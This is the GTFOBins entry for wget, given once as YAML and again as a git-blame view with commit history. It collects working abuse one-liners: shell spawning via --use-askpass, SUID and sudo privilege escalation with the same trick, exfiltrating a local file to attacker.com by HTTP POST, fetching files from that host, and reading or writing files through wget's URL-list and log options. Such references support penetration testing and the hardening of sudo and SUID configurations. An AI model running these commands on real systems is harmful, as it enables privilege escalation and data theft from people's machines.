GTFOBins.github.io/_gtfobins/wget.md

---
functions:
  shell:
    - code: |
        TF=$(mktemp)
        chmod +x $TF
        echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
        wget --use-askpass=$TF 0
  file-upload:
    - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
      code: |
        URL=http://attacker.com/
        LFILE=file_to_send
        wget --post-file=$LFILE $URL
  file-read:
    - description: The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.
      code: |
        LFILE=file_to_read
        wget -i $LFILE
  file-write:
    - description: The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.
      code: |
        LFILE=file_to_write
        TF=$(mktemp)
        echo DATA > $TF
        wget -i $TF -o $LFILE
  file-download:
    - description: Fetch a remote file via HTTP GET request.
      code: |
        URL=http://attacker.com/file_to_get
        LFILE=file_to_save
        wget $URL -O $LFILE
  suid:
    - code: |
        TF=$(mktemp)
        chmod +x $TF
        echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
        ./wget --use-askpass=$TF 0
  sudo:
    - code: |
        TF=$(mktemp)
        chmod +x $TF
        echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
        sudo wget --use-askpass=$TF 0
---
First commit 2018-05-21 21:14:41 +02:00			`---`
			`functions:`
Add wget shell via --use-askpass Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com> 2022-12-16 16:33:15 +01:00			`shell:`
			`- code: \|`
			`TF=$(mktemp)`
			`chmod +x $TF`
			`echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF`
			`wget --use-askpass=$TF 0`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-upload:`
Get rid of base64 for curl and wget and make descriptions similar Close #24. 2018-09-25 19:51:20 +02:00			- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`code: \|`
Remove some useless instances of export 2020-06-10 23:04:59 +02:00			`URL=http://attacker.com/`
			`LFILE=file_to_send`
Get rid of base64 for curl and wget and make descriptions similar Close #24. 2018-09-25 19:51:20 +02:00			`wget --post-file=$LFILE $URL`
Add wget file-read/write 2021-05-15 19:21:30 +02:00			`file-read:`
			- description: The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data.
			`code: \|`
			`LFILE=file_to_read`
			`wget -i $LFILE`
			`file-write:`
			- description: The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data.
			`code: \|`
			`LFILE=file_to_write`
			`TF=$(mktemp)`
			`echo DATA > $TF`
			`wget -i $TF -o $LFILE`
Adopt new function names 2018-10-05 19:55:38 +02:00			`file-download:`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`- description: Fetch a remote file via HTTP GET request.`
			`code: \|`
Remove some useless instances of export 2020-06-10 23:04:59 +02:00			`URL=http://attacker.com/file_to_get`
			`LFILE=file_to_save`
Fix YAMLs according to YAMLlint 2018-07-16 15:01:50 +02:00			`wget $URL -O $LFILE`
Adopt new function names 2018-10-05 19:55:38 +02:00			`suid:`
Add wget shell via --use-askpass Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com> 2022-12-16 16:33:15 +01:00			`- code: \|`
			`TF=$(mktemp)`
			`chmod +x $TF`
			`echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF`
			`./wget --use-askpass=$TF 0`
Adopt new function names 2018-10-05 19:55:38 +02:00			`sudo:`
Add wget shell via --use-askpass Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com> 2022-12-16 16:33:15 +01:00			`- code: \|`
			`TF=$(mktemp)`
			`chmod +x $TF`
			`echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF`
			`sudo wget --use-askpass=$TF 0`
Fix trailing spaces 2018-05-25 01:10:39 +02:00			`---`